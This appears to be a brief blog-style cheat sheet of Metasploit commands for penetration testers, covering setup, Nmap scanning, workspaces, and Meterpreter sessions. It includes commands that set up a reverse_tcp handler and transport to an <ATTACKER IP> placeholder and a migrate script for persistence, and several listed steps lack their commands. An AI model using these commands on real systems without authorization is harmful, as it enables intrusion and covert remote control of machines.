Skip to main content


Mastering Metasploit: A Comprehensive Guide for Ethical Hackers
Metasploit, a powerful and versatile penetration testing framework, stands as a cornerstone in the toolkit of ethical hackers and security professionals. In this article, we will delve into essential Metasploit commands and techniques, ensuring you harness its full potential.

Starting with Metasploit
  • Starting PostgreSQL Manually                                
sudo systemctl start postgresql
  • Creating the Metasploit Database
sudo msfdb init
  • Updating Metasploit                                   
sudo apt update && sudo apt install metasploit-framework
  • Launching Metasploit Console                         
sudo msfconsole -q

Network Reconnaissance
  • Conducting Nmap Scan within Metasploit           
db_nmap <TARGET IP> -A -Pn

Managing Workspaces
  • List Workspaces                                   
  • Add Workspace                                     
workspace -a <workspace_name>
  • Delete Workspace                                 
workspace -d <workspace_name>

Credential Management
  • Listing Discovered Credentials                       

Exploiting with Meterpreter
  • Adding a New Transport to Meterpreter Session       
transport add -t reverse_tcp -l <ATTACKER IP> -p 5555
  • Backgrounding the Session                           
  • Setting Up Multi/Handler                              
use multi/handler
  • Configuring Payload and Host                        
set payload windows/meterpreter/reverse_tcp
set LPORT 5555
  • Initiating Exploitation                           
exploit -j
  • Accessing Session                                 
sessions -i 1
  • Switching Transport                             
transport next

Enhancing Persistence
  • Migrating Meterpreter Shell                           
set AutoRunScript post/windows/manage/migrate

This guide provides a streamlined overview of Metasploit's core functionalities. As you embark on your ethical hacking journey, remember to use these commands responsibly and in compliance with legal and ethical standards. Stay vigilant, stay secure!